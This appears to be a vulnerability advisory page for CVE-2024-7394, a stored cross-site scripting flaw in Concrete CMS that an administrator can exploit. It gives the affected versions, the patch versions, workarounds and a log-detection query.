CVE-2024-7394 – Concrete CMS versions 9 through 9.3.2 and below... (How to Fix)

Q: What is the severity of CVE-2024-7394?

CVE-2024-7394 has a CVSS score of 4.8 (MEDIUM). Concrete CMS versions 9 through 9.3.2 and below 8.5.18 contain a stored cross-site scripting (XSS) vulnerability in the getAttributeSetName() function. A rogue administrator can inject malicious JavaScript that executes when other users view affected pages. This affects all Concrete CMS installations with vulnerable versions and administrator accounts.

📋 TL;DR

Concrete CMS versions 9 through 9.3.2 and below 8.5.18 contain a stored cross-site scripting (XSS) vulnerability in the getAttributeSetName() function. A rogue administrator can inject malicious JavaScript that executes when other users view affected pages. This affects all Concrete CMS installations with vulnerable versions and administrator accounts.

💻 Affected Systems

Products:

Concrete CMS

Versions: Concrete CMS 9.0.0 through 9.3.2, and all versions below 8.5.18

Operating Systems: All operating systems running Concrete CMS

Default Config Vulnerable: ⚠️ Yes

Notes: All default configurations of affected versions are vulnerable. Exploitation requires administrator privileges.

📦 What is this software?

Concrete Cms by Concretecms

View all CVEs affecting Concrete Cms →

Concrete Cms by Concretecms

View all CVEs affecting Concrete Cms →

⚠️ Risk & Real-World Impact

🔴

Worst Case

A malicious administrator could steal session cookies, redirect users to phishing sites, or perform actions on behalf of authenticated users, potentially leading to account compromise or data theft.

🟠

Likely Case

A rogue administrator injects malicious scripts that execute in victims' browsers, potentially stealing session tokens or performing unauthorized actions within the CMS.

🟢

If Mitigated

With proper administrator vetting and monitoring, the impact is limited since exploitation requires administrative privileges.

🌐 Internet-Facing: MEDIUM

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires administrative access to the Concrete CMS instance. The vulnerability is in the getAttributeSetName() function where input validation is insufficient.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Concrete CMS 9.3.3 or 8.5.18

Vendor Advisory: https://documentation.concretecms.org/9-x/developers/introduction/version-history/933-release-notes

Restart Required: No

Instructions:

1. Backup your Concrete CMS installation and database. 2. Update to Concrete CMS 9.3.3 (for version 9.x) or 8.5.18 (for version 8.x). 3. Verify the update completed successfully. 4. Clear any CMS caches if applicable.

🔧 Temporary Workarounds

Input Sanitization Enhancement

all

Implement additional input validation and output encoding for attribute set names

Not applicable - requires code modification

Administrator Access Restriction

all

Limit administrator accounts to trusted personnel only and implement role-based access controls

Not applicable - configuration change

🧯 If You Can't Patch

Implement strict Content Security Policy (CSP) headers to mitigate XSS impact
Monitor administrator activities and audit logs for suspicious behavior

🔍 How to Verify

Check if Vulnerable:

Check your Concrete CMS version. If running version 9.0.0-9.3.2 or any version below 8.5.18, you are vulnerable.

Check Version:

Check the Concrete CMS dashboard or examine the concrete/config/concrete.php file version constant

Verify Fix Applied:

After updating, verify you are running Concrete CMS 9.3.3 or 8.5.18 or higher.

📡 Detection & Monitoring

Log Indicators:

Unusual administrator activity modifying attribute sets
Suspicious JavaScript in attribute set names or database entries

Network Indicators:

Unexpected outbound connections from CMS pages to external domains

SIEM Query:

source="concrete_cms_logs" AND (event="attribute_set_modified" OR event="admin_activity") AND (message="*script*" OR message="*javascript*")

📊 Metadata

CVE ID: CVE-2024-7394

CVSS v3 Score: 4.8 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

CWE: CWE-79

Published: August 8, 2024

Last Updated: September 25, 2025

🔗 References

https://documentation.concretecms.org/9-x/developers/introduction/version-history/933-release-notes?pk_vid=e367a434ef4830491723055753d52041 Release Notes,Vendor Advisory
https://documentation.concretecms.org/developers/introduction/version-history/8518-release-notes?pk_vid=e367a434ef4830491723055758d52041 Release Notes,Vendor Advisory
https://github.com/concretecms/concretecms/commit/c08d9671cec4e7afdabb547339c4bc0bed8eab06 Patch
https://github.com/concretecms/concretecms/pull/12166 Issue Tracking,Patch

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-7394, you might also want to check these: